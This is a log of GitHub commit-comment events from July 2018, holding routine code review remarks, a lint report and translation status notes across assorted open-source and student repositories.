{"id":"7933638617","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29632621,"position":null,"line":null,"path":null,"commit_id":"aca17152f84fba427658fa267cb49891525142fd","created_at":"2018-07-08T09:11:26Z","updated_at":"2018-07-08T09:11:26Z","author_association":"MEMBER","body":"https://github.com/symless/synergy-core/issues/6345"}},"created_at":"2018-07-08T09:11:26Z"}
{"id":"7933643967","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632634,"position":15,"line":37,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T09:16:08Z","updated_at":"2018-07-08T09:16:08Z","author_association":"MEMBER","body":"Just a bit of context: The diff here is probably as old as 2010-2013 with some compatibility sprinkled on top over for when FreeBSD 11 came along. It has never been merged to FreeBSD. Hiroki who originally wrote this has not answered to my questions for FreeBSD inclusion over the years.\r\n\r\nMaybe if we can get RFC 5969 pinned down it's finally ready for that.."}},"created_at":"2018-07-08T09:16:08Z"}
{"id":"7933646681","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/borg.localrole"},"payload":{"comment":{"id":29632639,"position":null,"line":null,"path":null,"commit_id":"1931ff3849761acb65ac9ea65f6a08fe1f3e0232","created_at":"2018-07-08T09:18:25Z","updated_at":"2018-07-08T09:18:25Z","author_association":"NONE","body":"@ale-rt Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-borg.localrole/34/violations\n```\nborg/localrole/tests.py:53:26: Q000 Remove bad quotes.\nborg/localrole/tests.py:53:46: Q000 Remove bad quotes.\nborg/localrole/tests.py:56:34: C812 missing trailing comma\nborg/localrole/tests.py:67:78: C812 missing trailing comma\nborg/localrole/tests.py:76:35: C812 missing trailing comma\nborg/localrole/tests.py:81:78: C812 missing trailing comma\nborg/localrole/tests.py:83:35: C812 missing trailing comma\nborg/localrole/interfaces.py:8:58: C812 missing trailing comma\nborg/localrole/interfaces.py:13:78: C812 missing trailing comma\nborg/localrole/__init__.py:20:24: C812 missing trailing comma\nborg/localrole/utils.py:25:9: T003 print function found.\nborg/localrole/utils.py:25:15: Q000 Remove bad quotes.\nborg/localrole/utils.py:25:15: S001 found module formatter\nborg/localrole/utils.py:35:27: P002 found \"hasattr\", consider replacing it\nborg/localrole/workspace.py:6:1: I001 isort found an import in the wrong position\nborg/localrole/workspace.py:22:5: Q000 Remove bad quotes.\nborg/localrole/workspace.py:24:14: Q000 Remove bad quotes.\nborg/localrole/workspace.py:24:50: C812 missing trailing comma\nborg/localrole/workspace.py:32:17: C812 missing trailing comma\nborg/localrole/workspace.py:44:42: C812 missing trailing comma\nborg/localrole/workspace.py:45:14: C812 missing trailing comma\nborg/localrole/workspace.py:137:0: P102 docstring does contain unindexed parameters\nborg/localrole/workspace.py:268:13: D001 found directlyProvides( replace it with zope.interface.provider\nborg/localrole/workspace.py:269:13: D001 found directlyProvides( replace it with zope.interface.provider\nborg/localrole/workspace.py:316:80: E501 line too long (84 > 79 characters)\nborg/localrole/workspace.py:336:80: E501 line too long (86 > 79 characters)\nborg/localrole/workspace.py:378:17: Q000 Remove bad quotes.\nborg/localrole/workspace.py:381:34: Q000 Remove bad quotes.\nborg/localrole/workspace.py:390:16: P002 found \"hasattr\", consider replacing it\nborg/localrole/workspace.py:444:19: T000 Todo note found.\nborg/localrole/workspace.py:448:46: C812 missing trailing comma\nborg/localrole/workspace.py:454:75: C812 missing trailing comma\nborg/localrole/workspace.py:458:5: C901 'WorkspaceLocalRoleManager.checkLocalRolesAllowed' is too complex (14)\nborg/localrole/workspace.py:482:15: T000 Todo note found.\nborg/localrole/workspace.py:510:22: T000 Todo note found.\nborg/localrole/workspace.py:516:7: T000 Todo note found.\nborg/localrole/factory_adapter.py:68:13: D001 found directlyProvides( replace it with zope.interface.provider\nborg/localrole/factory_adapter.py:84:13: D001 found directlyProvides( replace it with zope.interface.provider\nborg/localrole/factory_adapter.py:95:0: P102 docstring does contain unindexed parameters\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-08T09:18:25Z"}
{"id":"7933646982","type":"CommitCommentEvent","actor":{"login":"adam-kaczmarek-coderslab"},"repo":{"name":"TobiaszZ/Warsztaty_1"},"payload":{"comment":{"id":29632640,"position":null,"line":null,"path":null,"commit_id":"113f3c87615318fc906fe6a8b868d95a06f0f777","created_at":"2018-07-08T09:18:42Z","updated_at":"2018-07-08T09:18:42Z","author_association":"NONE","body":"@TobiaszZ Sporo kodu ci się powtarza. Spróbuj wyciągnąć powtarzający się kod do osobnej metody. Być może bedziesz musiał trochę przerobić program.\r\n\r\nPrzykład:\r\n- zamiast sprawdzć czy zapis zawiera + lub zawiera - lub nie zawiera ani plusa ani minusa napisz metodę która zwróci ci wartość modyfikatora. Niech ma ona sygnaturę `int getModifier(String diceString)` gdzie diceString to np: 2D6-3 i metoda zwróci int -3\r\n- podobnie - metoda która zwóci ci ile razy masz rzucić kostką. Metoda niech ma sygnaturę `int getCount(String diceString)` gdzie dla diceString = 2D6-3 zwróci 2\r\n- dla rodzaju kostki `int getDice(String diceString)` dle 2D6-3 zwróci 6"}},"created_at":"2018-07-08T09:18:42Z"}
{"id":"7933648922","type":"CommitCommentEvent","actor":{"login":"frenck"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":29632647,"position":null,"line":null,"path":null,"commit_id":"34392db9e4eadb3ae31e5c7ca3542cb0291a02ad","created_at":"2018-07-08T09:20:21Z","updated_at":"2018-07-08T09:20:21Z","author_association":"MEMBER","body":"Not sure about the concern here @elupus?\r\nDanielhiversen is one of the Home Assistant members and maintainers and has there for the rights to do this.\r\n"}},"created_at":"2018-07-08T09:20:21Z"}
{"id":"7933660620","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/src"},"payload":{"comment":{"id":29632680,"position":94,"line":165,"path":"sys/net/if_stf.c","commit_id":"2bab086d417ecc50518067358b72f8c48a19b26b","created_at":"2018-07-08T09:30:29Z","updated_at":"2018-07-08T09:30:29Z","author_association":"MEMBER","body":"Does not exist for FreeBSD. Can activate using:\r\n\r\n    # sysctl net.link.stf.stf_debug=1\r\n\r\nRequires the kernel module to be loaded... STF_DEBUG 1 / 3 seems impractical though."}},"created_at":"2018-07-08T09:30:29Z"}
{"id":"7933660756","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29632681,"position":9,"line":6,"path":"lesson8/passenger_wagon.rb","commit_id":"4e9811f74d640ebc2e0fbd4689416947a459d11e","created_at":"2018-07-08T09:30:35Z","updated_at":"2018-07-08T09:30:35Z","author_association":"NONE","body":"здесь правильно будет написать вот так:\r\n```ruby\r\ndef load_item\r\n  super(1)\r\nend\r\n```\r\nтаким образом будут выполнены требования ТЗ:\r\n- метод не прниимает аргументы\r\n- метод увеличивает загрузку на 1\r\nи будет правильным образом использованы механизмы наследования / полиморфизма:\r\n- метод переоеределён в наследнике с добавлением специфики\r\n- метод вызывает функционал родителя и не дублирует код\r\n"}},"created_at":"2018-07-08T09:30:35Z"}
{"id":"7933661558","type":"CommitCommentEvent","actor":{"login":"Havenriley"},"repo":{"name":"Havenriley/data"},"payload":{"comment":{"id":29632683,"position":4,"line":8,"path":"README.md","commit_id":"6f1b520033b3950b65da5c217a332728dfac74e8","created_at":"2018-07-08T09:31:13Z","updated_at":"2018-07-08T09:31:13Z","author_association":"OWNER","body":"I am a little  lost thank you for helping me"}},"created_at":"2018-07-08T09:31:13Z"}
{"id":"7933663576","type":"CommitCommentEvent","actor":{"login":"kamotswind"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29632691,"position":null,"line":null,"path":null,"commit_id":"0e225b2a7a16fd59f55673e892cdbccd9522ee6e","created_at":"2018-07-08T09:33:03Z","updated_at":"2018-07-08T09:33:03Z","author_association":"NONE","body":"Just saw your note. This makes a lot more sense now."}},"created_at":"2018-07-08T09:33:03Z"}
{"id":"7933664618","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29632693,"position":null,"line":null,"path":null,"commit_id":"4256488f7aee060a48dc7b1eff9fd672eb2faa3e","created_at":"2018-07-08T09:34:00Z","updated_at":"2018-07-08T09:34:00Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Инициализировать приложение Django](https://trello.com/c/sWBqdaJ1/13-%D0%B8%D0%BD%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D0%B8%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BF%D1%80%D0%B8%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-django)"}},"created_at":"2018-07-08T09:34:00Z"}
{"id":"7933664769","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29632694,"position":null,"line":null,"path":null,"commit_id":"4ddfa64239f0c5b9e473f4fc6088eaf716ddbdbd","created_at":"2018-07-08T09:34:06Z","updated_at":"2018-07-08T09:34:06Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Инициализировать приложение Django](https://trello.com/c/sWBqdaJ1/13-%D0%B8%D0%BD%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D0%B8%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BF%D1%80%D0%B8%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-django)"}},"created_at":"2018-07-08T09:34:06Z"}
{"id":"7933666928","type":"CommitCommentEvent","actor":{"login":"mehedi-sharif"},"repo":{"name":"themefisher/airspace-hugo"},"payload":{"comment":{"id":29632700,"position":null,"line":null,"path":null,"commit_id":"5f578b05b6fc32f029d729d984bd941cc8ee8bb4","created_at":"2018-07-08T09:35:55Z","updated_at":"2018-07-08T09:35:55Z","author_association":"CONTRIBUTOR","body":"It should not be changed . You made wrong push request . "}},"created_at":"2018-07-08T09:35:55Z"}
{"id":"7933667529","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632702,"position":14,"line":14,"path":"coduck-batch/src/main/java/com/coduck/season/service/SeasonService.java","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T09:36:26Z","updated_at":"2018-07-08T09:36:26Z","author_association":"CONTRIBUTOR","body":"무슨 Exception인지 명확히 던졌으면 좋겠어요"}},"created_at":"2018-07-08T09:36:26Z"}
{"id":"7933670573","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632710,"position":64,"line":103,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:38:54Z","updated_at":"2018-07-08T09:38:54Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:38:54Z"}
{"id":"7933671033","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632713,"position":66,"line":105,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:39:13Z","updated_at":"2018-07-08T09:39:13Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:39:13Z"}
{"id":"7933671194","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632715,"position":71,"line":109,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:39:22Z","updated_at":"2018-07-08T09:39:22Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:39:22Z"}
{"id":"7933671252","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632716,"position":74,"line":111,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:39:25Z","updated_at":"2018-07-08T09:39:25Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:39:25Z"}
{"id":"7933671339","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632717,"position":77,"line":113,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:39:29Z","updated_at":"2018-07-08T09:39:29Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:39:29Z"}
{"id":"7933671396","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632718,"position":82,"line":117,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:39:32Z","updated_at":"2018-07-08T09:39:32Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:39:32Z"}
{"id":"7933672584","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632724,"position":33,"line":74,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:40:36Z","updated_at":"2018-07-08T09:40:36Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:40:36Z"}
{"id":"7933673026","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632728,"position":36,"line":76,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:41:01Z","updated_at":"2018-07-08T09:41:01Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:41:01Z"}
{"id":"7933673547","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632732,"position":86,"line":120,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:41:28Z","updated_at":"2018-07-08T09:41:28Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:41:28Z"}
{"id":"7933673744","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632733,"position":96,"line":130,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:41:39Z","updated_at":"2018-07-08T09:41:39Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:41:39Z"}
{"id":"7933673844","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632734,"position":102,"line":135,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:41:44Z","updated_at":"2018-07-08T09:41:44Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:41:44Z"}
{"id":"7933673891","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632735,"position":107,"line":139,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:41:47Z","updated_at":"2018-07-08T09:41:47Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:41:47Z"}
{"id":"7933673898","type":"CommitCommentEvent","actor":{"login":"dustinscarter89"},"repo":{"name":"dustinscarter89/DataScience"},"payload":{"comment":{"id":29632736,"position":null,"line":null,"path":null,"commit_id":"74e889d6faa856a9d2615c4100232e63acc80488","created_at":"2018-07-08T09:41:48Z","updated_at":"2018-07-08T09:41:48Z","author_association":"OWNER","body":"Artifacts of data science projects. "}},"created_at":"2018-07-08T09:41:48Z"}
{"id":"7933673933","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632737,"position":110,"line":141,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:41:50Z","updated_at":"2018-07-08T09:41:50Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:41:50Z"}
{"id":"7933674009","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632738,"position":113,"line":143,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:41:53Z","updated_at":"2018-07-08T09:41:53Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:41:53Z"}
{"id":"7933674061","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632739,"position":116,"line":145,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:41:56Z","updated_at":"2018-07-08T09:41:56Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:41:56Z"}
{"id":"7933674133","type":"CommitCommentEvent","actor":{"login":"ngocloc2008"},"repo":{"name":"ngocloc2008/lol-dice"},"payload":{"comment":{"id":29632741,"position":null,"line":null,"path":null,"commit_id":"c615064170108502dd6bd4f257d5741dfe19bf96","created_at":"2018-07-08T09:42:01Z","updated_at":"2018-07-08T09:42:01Z","author_association":"OWNER","body":"user"}},"created_at":"2018-07-08T09:42:01Z"}
{"id":"7933674162","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632742,"position":134,"line":165,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:42:02Z","updated_at":"2018-07-08T09:42:02Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:42:02Z"}
{"id":"7933674228","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632743,"position":140,"line":171,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:42:05Z","updated_at":"2018-07-08T09:42:05Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:42:05Z"}
{"id":"7933674318","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29632744,"position":82,"line":69,"path":"contracts/RockPaperScissors.sol","commit_id":"f6d452abe1551e7d041cac5332dfd155d3c28e68","created_at":"2018-07-08T09:42:09Z","updated_at":"2018-07-08T09:42:09Z","author_association":"OWNER","body":"Interesting!\r\n\r\nI was trying to find a way to store unmatched moves. Imagine that somebody wants to play for max 1 ether, so he/she makes an initial move. This move needs to be stored until someone is willing to play for the same amount of money. So you might end up with n unmatched moves. Running out of gas is thus a very likely case if your service gets popular. Fact is with this approach you need to find a matching move. So you would have to use a structure that keeps those moves logically together. Anyway, this won't work.\r\n\r\nWhat I could do is just keep the last move (a single move). If another player wants to play, but not for the proposed money, so be it, he/she would get a message and he has to lower the amount of just try later. In this case, you wouldn't need any data structure for the initial moves. Once another player is found you can create a game. This game is associated with both players, and their initial committed moves. The initial move made by the first player is the id of the game. This id is known by both players, they will receive it upon submitting their initial (committed) move. At this point this id can be used a a key to a mapping and the value will be the game struct. As a result, it can be a service where multiple players can play multiple games. The advantage is that you will not have gas problems, no game structure maintenance (removing the gaps from the array). Downside of this approach is that players will have problems finding each others, they frequently will have to submit initial moves, before they will be satisfied. If initial moves are kept in an array, they can just wait until somebody arrives. \r\n\r\n\r\n\r\n"}},"created_at":"2018-07-08T09:42:09Z"}
{"id":"7933674383","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632745,"position":160,"line":186,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:42:13Z","updated_at":"2018-07-08T09:42:13Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:42:13Z"}
{"id":"7933674445","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632746,"position":169,"line":204,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:42:16Z","updated_at":"2018-07-08T09:42:16Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:42:16Z"}
{"id":"7933674579","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632747,"position":176,"line":210,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:42:23Z","updated_at":"2018-07-08T09:42:23Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:42:23Z"}
{"id":"7933674773","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632748,"position":181,"line":214,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:42:35Z","updated_at":"2018-07-08T09:42:35Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:42:35Z"}
{"id":"7933674922","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632749,"position":182,"line":215,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:42:44Z","updated_at":"2018-07-08T09:42:44Z","author_association":"COLLABORATOR","body":"updated (fix required)"}},"created_at":"2018-07-08T09:42:44Z"}
{"id":"7933675275","type":"CommitCommentEvent","actor":{"login":"kibertoad"},"repo":{"name":"tgriesser/knex"},"payload":{"comment":{"id":29632750,"position":null,"line":null,"path":null,"commit_id":"8a2167630ae973cf3deb20cbf4372ed435bae4f0","created_at":"2018-07-08T09:43:01Z","updated_at":"2018-07-08T09:43:01Z","author_association":"CONTRIBUTOR","body":"Is it correct that node 6 and node 8 oracle envs are all under node 10 conf branch? "}},"created_at":"2018-07-08T09:43:01Z"}
{"id":"7933675410","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632751,"position":192,"line":222,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:43:09Z","updated_at":"2018-07-08T09:43:09Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:43:09Z"}
{"id":"7933675535","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632752,"position":194,"line":224,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:43:14Z","updated_at":"2018-07-08T09:43:14Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:43:14Z"}
{"id":"7933675742","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632753,"position":220,"line":256,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:43:25Z","updated_at":"2018-07-08T09:43:25Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:43:25Z"}
{"id":"7933675759","type":"CommitCommentEvent","actor":{"login":"kibertoad"},"repo":{"name":"tgriesser/knex"},"payload":{"comment":{"id":29632754,"position":null,"line":null,"path":null,"commit_id":"8a2167630ae973cf3deb20cbf4372ed435bae4f0","created_at":"2018-07-08T09:43:26Z","updated_at":"2018-07-08T09:43:26Z","author_association":"CONTRIBUTOR","body":"@elhigu "}},"created_at":"2018-07-08T09:43:26Z"}
{"id":"7933675798","type":"CommitCommentEvent","actor":{"login":"Havenriley"},"repo":{"name":"GoogleTrends/data"},"payload":{"comment":{"id":29632755,"position":15,"line":13,"path":"README.md","commit_id":"2a7a75f66ec022e585939d8984fb7feea254ea9a","created_at":"2018-07-08T09:43:28Z","updated_at":"2018-07-08T09:43:28Z","author_association":"NONE","body":"These open source pages are not used for a good purpose someone is using them to access my mobile"}},"created_at":"2018-07-08T09:43:28Z"}
{"id":"7933675884","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632756,"position":258,"line":308,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:43:32Z","updated_at":"2018-07-08T09:43:32Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:43:32Z"}
{"id":"7933676016","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632757,"position":287,"line":333,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:43:39Z","updated_at":"2018-07-08T09:43:39Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:43:39Z"}
{"id":"7933676127","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632758,"position":331,"line":372,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:43:45Z","updated_at":"2018-07-08T09:43:45Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:43:45Z"}
{"id":"7933676252","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632759,"position":358,"line":398,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:43:52Z","updated_at":"2018-07-08T09:43:52Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:43:52Z"}
{"id":"7933676456","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632760,"position":367,"line":410,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:44:05Z","updated_at":"2018-07-08T09:44:05Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:44:05Z"}
{"id":"7933676567","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632761,"position":372,"line":414,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:44:10Z","updated_at":"2018-07-08T09:44:10Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:44:10Z"}
{"id":"7933676872","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632762,"position":385,"line":427,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:44:26Z","updated_at":"2018-07-08T09:44:26Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:44:26Z"}
{"id":"7933676938","type":"CommitCommentEvent","actor":{"login":"hachi8833"},"repo":{"name":"yasslab/railsguides.jp"},"payload":{"comment":{"id":29632763,"position":408,"line":451,"path":"guides/source/configuring.md","commit_id":"18328847f801fa8827726dd67a4825951875e9d5","created_at":"2018-07-08T09:44:30Z","updated_at":"2018-07-08T09:44:30Z","author_association":"COLLABORATOR","body":"updated"}},"created_at":"2018-07-08T09:44:30Z"}
{"id":"7933677003","type":"CommitCommentEvent","actor":{"login":"kingbbode"},"repo":{"name":"10duck/coduck-project"},"payload":{"comment":{"id":29632765,"position":1,"line":1,"path":"coduck-batch/src/main/resources/import.sql","commit_id":"feb1b3923ac6449e23e276c4835f98675ab4bd3d","created_at":"2018-07-08T09:44:33Z","updated_at":"2018-07-08T09:44:33Z","author_association":"CONTRIBUTOR","body":"import sql은 테스트용으로는 가급적 사용하지 않는게 좋을 것 같아요."}},"created_at":"2018-07-08T09:44:33Z"}
